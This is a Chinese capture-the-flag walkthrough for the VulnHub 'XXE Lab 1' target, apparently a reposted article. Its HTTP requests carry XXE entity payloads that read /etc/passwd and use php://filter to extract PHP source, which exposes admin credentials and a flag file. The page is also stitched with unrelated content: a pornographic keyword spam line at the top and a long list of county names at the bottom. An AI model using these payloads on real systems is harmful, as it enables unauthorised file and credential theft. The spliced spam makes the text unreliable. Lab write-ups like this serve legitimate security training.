国产精品天干天干,亚洲毛片在线,日韩gay小鲜肉啪啪18禁,女同Gay自慰喷水

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

【攻略鴨】XXE Lab 1_VulnHub靶機(jī)攻略

2023-01-06 11:06 作者:攻略鴨  | 我要投稿

本文內(nèi)容純屬虛構(gòu),B站攻略鴨求關(guān)注點(diǎn)贊支持!

靶機(jī)地址:

$ sudo arp-scan -l
192.168.221.151

http://192.168.221.151/xxe/

外部信息收集

端口掃描

80/tcp ? open ?http ? ?syn-ack ttl 64 Apache httpd 2.4.27 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/xxe/* /admin.php
5355/tcp open ?llmnr? ?syn-ack ttl 1

網(wǎng)站信息

看到登錄框,嘗試登錄并抓包:

POST /xxe/xxe.php HTTP/1.1
Host: 192.168.221.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 95
Origin: http://192.168.221.151
Connection: close
Referer: http://192.168.221.151/xxe/

<?xml version="1.0" encoding="UTF-8"?><root><name>tester</name><password>test</password></root>

修改請(qǐng)求包測(cè)試:

POST /xxe/xxe.php HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY tester SYSTEM "file:///etc/passwd">
]>
<root><name>&tester;</name><password>test</password></root>

返回包:

root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
xxx省略部分xxx
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
r00t:x:1000:1000:Administrator,,,:/home/r00t:/bin/bash

可見(jiàn)存在XXE漏洞。

XXE漏洞利用

直接訪問(wèn)http://192.168.221.151/admin.php返回404。

利用XXE漏洞讀取PHP文件:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

返回值Base64解碼后主要內(nèi)容為:

<?php
? ?$msg = '';
? ?if (isset($_POST['login']) && !empty($_POST['username'])
? ? ? && !empty($_POST['password'])) {
?

? ? ? if ($_POST['username'] == 'administhebest' &&
? ? ? ? ?md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
? ? ? ? ?$_SESSION['valid'] = true;
? ? ? ? ?$_SESSION['timeout'] = time();
? ? ? ? ?$_SESSION['username'] = 'administhebest';
? ? ? ? ?
? ? ? ?echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
echo $flag;
? ? ? }else {
? ? ? ? ?$msg = 'Maybe Later';
? ? ? }
? ?}
?>
</div> <!-- W00t/W00t -->

整理上面信息得到:

Flag位置:/flagmeout.php
username:administhebest
password:admin@123(md5:e6e061838856bf47e1de730719fb2609)
W00t/W00t

利用XXE讀取flagmeout.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

返回值Base64解碼后為:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

注釋表明flag位置需要解碼32位的JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 Base32解碼得到L2V0Yy8uZmxhZy5waHA= 再Base64解碼得到/etc/.flag.php

利用XXE讀取/etc/.flag.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

得到:

JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK

Base64解碼得到:

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$à=+_;$á=$?=$?=$?=$?=$è=$é=$ê=$?=++$á[];$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$è++;$è++;$è++;$è++;$è++;$é++;$é++;$é++;$é++;$é++;$é++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$__('$_="'.$___.$á.$?.$?.$___.$á.$à.$á.$___.$á.$à.$è.$___.$á.$à.$?.$___.$á.$?.$?.$___.$á.$?.$à.$___.$á.$é.$?.$___.$á.$é.$à.$___.$á.$é.$à.$___.$á.$?.$?.$___.$á.$?.$é.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$?.$é.$___.$á.$?.$?.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$é.$á.$___.$á.$é.$?.'"');$__($_);

再腳本首部添加<?php,運(yùn)行PHP腳本得到flag:SAFCSP{xxe_is_so_easy}

標(biāo)簽:

【攻略鴨】XXE Lab 1_VulnHub靶機(jī)攻略的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
亳州市| 湄潭县| 宁蒗| 潜江市| 武宁县| 临澧县| 延津县| 平湖市| 积石山| 凤庆县| 屏山县| 德化县| 东乡| 上林县| 青阳县| 阳原县| 盐山县| 施甸县| 宜春市| 扶绥县| 绥化市| 和林格尔县| 牟定县| 德保县| 潮安县| 裕民县| 苗栗县| 德清县| 美姑县| 南丰县| 满城县| 松潘县| 来安县| 通榆县| 河西区| 新邵县| 新巴尔虎左旗| 凤庆县| 玛曲县| 黔南| 呼和浩特市|